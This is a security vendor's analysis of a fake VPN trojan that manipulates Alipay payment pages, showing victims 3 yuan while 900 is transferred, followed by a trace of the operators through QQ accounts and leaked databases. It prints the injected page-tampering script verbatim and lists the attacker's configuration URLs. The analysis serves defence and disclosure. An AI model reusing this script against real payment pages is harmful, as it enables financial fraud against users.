背景分析

支付寶作為國內線上支付市場的老大飽受惡意程式碼的侵擾，黑產總在如何通過支付寶騙取錢財上發揮著聰明才智。

熟悉網路安全、破解逆向的朋友一定對於52pojie這個網站不會感到陌生，它是我國為數不多的關注計算機軟體安全的技術網站。本次事件發端於52pojie上的一篇名為“支付寶轉3塊扣1900，這是咋回事 ”的貼子，說了這樣一個經歷：樓主在網上買VPN代理想科學上網，用支付寶付款時顯示3塊錢，但輸完支付寶驗證碼後卻被扣了1900元。而這背後究竟發生了些什麼？

過程分析

根據帖子中的描述，我們試著訪問提及的網站hxxp://cctv168.cc/，而網友之所以找到這個網站，是通過搜尋引擎搜尋VPN的時候，進入釣魚頁面，然後網友下載該VPN而受騙，而現在搜尋關鍵詞“VPN”已經找不到這個站了。如圖：

在瀏覽器中輸入網址，回車後現在看到明確的惡意網站提示：

我們當然忽略警告繼續訪問，背後的網站是這個樣子：

帖子中的當事人很可能沒能安裝使用360衛士，不然幾乎不可能在層層提示下還會一條道走到黑。現實是我們的可憐樓主可能真的就下載運行了惡意網站誘導的所謂VPN客戶端程式，樣本執行後，向用戶展示介面如下介面：

當然，只是不管你在何時以何種姿勢點選連線，都會提示您會員已經過期。沒辦法，只有點選購物車按鈕，購買會員才能使用。

在購買介面，給出的應付金額是3元，在這個黃金週的旅遊景區，上個廁所都比這個貴，所以分分鐘就點選了同意開通。

事實上點選了同意開通後，樣本執行了如下不為使用者所知的動作：

1. 訪問http://463038264.lofter.com網站，讀取到包括每次轉賬的金額（這裡為每次轉900元）、轉賬時顯示的支付寶姓名（這裡為長江電子商務有限公司）以及支付寶賬號（[email protected]）等配置資訊。

2. 帶著http://www.alipay.com引數啟動IEXPLORE.EXE，使用易語言（惡意程式碼作者的日常之選）封裝的DOM類庫，查詢當前瀏覽器是不是正在進行付款操作。

3. 如果當前正在進行付款操作，根據付款的流程，修改網頁的顯示。使用易語言的類成員方法（0x4040DB處），修改頁面顯示內容。此處方法有兩個引數，引數一為“exescript”，引數二為要執行的指令碼程式碼。將頁面上顯示的金額資訊與付款金額填寫為下圖樣式。至此，細心的人應該發現，軟體能夠幫你把金額和收款人自動填寫上，當然也可以悄無聲息地修改資訊。

引數二的指令碼內容為：

seajs.use(“jquery”,function($)

{$(‘#reason’).val(‘USERvpn111 MCZ2016254525’);

$(‘#ipt-search-key’).val(‘[email protected]’);

vara1=$(‘#amount’).clone();

$(‘#amount’).css(‘display’,‘none’);

$(‘#amunt’).val(‘900’);a1.val(‘3’);

a1.attr(‘id’,‘amount1’);

a1.removeAttr(‘name’);

a1.insertAfter($(‘label[for=”amount”]’));

}

);

4. 在上一步的操作中，支付寶實際支付的金額已經被修改成了900元，只不是因為軟體作者通過指令碼將顯示的數字改成3元。在支付寶付款過程中，單擊下一步後，正常的頁面應該是這樣的：

而在軟體的幫忙下通過0x4046D6處函式的呼叫將頁面做了瞞天過海式的修改：

一、將付款金額改成3元，

二、將收款人修改成“長江電子商務有限公司“，在短短不到一秒鐘的時間裡，讓人眼不見心不煩，提升了購物體驗。

修改頁面的程式碼：

5. 在付款的最後一步，使用與第四步同樣的障眼手法。被修改之前：

修改後：

6. 最後，真實的交易資料被髮送到伺服器。事已至此，雖然肉眼已經無法再辨別出網頁顯示其實已經被篡改過，但從網路流量中發出的付款金額為900元。

此時，看起來只支援了3元的一次完整購買過程就結束了。待事後事主看支付寶日誌記錄，才會發現轉出的是900元，而不是3元。而這時，木馬作者極可能正拿著這些錢吃著火鍋唱著歌，還把著妹……

木馬溯源

木馬使用易語言編寫，原理也並不複雜，技術方面沒有太多值得細講的地方。我們關心的是這種盜錢木馬出自誰手？又經誰手進入網路？依賴360威脅情報中心的資料，追查其幕後黑手卻也並不是什麼難事，接著往下看。

樣本中的配置檔案來自於http://463038264.lofter.com網站，網頁上出現了兩個可疑的號碼，463038264和2953766158，確認兩個號碼是QQ號。

在QQ簽名信息是“1元1000鑽石充值地址：http://dwz.cn/34thJj （下載前關閉防毒），活動僅限於4月9號晚12點，明天恢復正常價格！”，訪問http://dwz.cn/34thJj，得到一批同源樣本：

通過特徵從360樣本庫中找到一些同源樣本，發現木馬作者有好多種騙錢的程式，整理後如圖：

通過對同源樣本的挖掘和網上某社工庫的查詢，發現該團伙如下：牧馬人A和開發人員B。

一、 牧馬人A：

牧馬人A是實際操作詐騙的人。根據配置網頁中提供的號碼為2053766158，如圖為該QQ的個人資料頁:

通過搜尋該QQ號，可以確定這個QQ號屬於木馬使用者，這是網友李安在5月14日發的被詐騙的資訊：

通過對該QQ和同源樣本的挖掘找到了該QQ作者的大號：258****：

而且，還有一名徒弟的出場客串：

該帥哥的價值觀嚴重扭曲：

同時，通過樣本又關聯到該木馬作者的兩外要給另外一配置檔案地址：

http://yanhuaxiang396.lofter.com/

深入挖掘，發現他們開了一家公司：揚州**電子商務有限公司，這公司當然做SEO非常牛逼，因為是電子商務公司，而A有可能是公司的一個員工，在幹私活，通過學到的SEO技術去做優化，把自己的VPN釣魚站拍到搜尋引擎前面。

二、開發人員B：

開發人員B是詐騙軟體開發的人，同時還是一個定製開發易語言程式的，他的QQ為12077*****：

然後從QQ的個人說明中，找到了他家的店鋪：

根據他阿里旺旺的資訊，找到了另外的一個QQ：10092*****

根據他阿里旺旺的資訊，找到了另外的一個QQ：10092*****

通過對該QQ小號的關聯，發現了他的大號4470*****，從資料上看是一個從事網際網路行業的人，吉林的，從群關係資料庫可以看出他學習易語言和開發外掛已經很久了：

通過查詢群關係資料庫，

通過搜尋引擎搜尋該QQ，找到了作者的手機、郵箱和真名，如圖：

這是整個團伙的分工圖：

此外，作者充值業務廣泛，包含但不限於以下業務：

小結

木馬作者使用的手段並不新奇，如果當時能夠不輕信，如果當時能夠不關殺軟……但是沒有如果。不誇張地說，現今的網路處處遍佈陷井，保持安全軟體的實時防護狀態並及時安裝漏洞補丁，才有可能在這魔鬼出沒的世界中避免遭受欺詐和數字綁票。但是，武裝到牙齒就夠了嗎？很多時候人總是帶著僥倖的心理，人性的弱點最難以克服，no patch to stupid，再強大的安全工具在哪怕不那麼高明的社工面前也往往一觸即潰。控制好奇心，抵制貪婪，遏制恐懼，這些是一生的修行。

順祝各位看官520表白成功！

文/360天眼實驗室

原文出處——FreeBuf黑客與極客（FreeBuf.COM）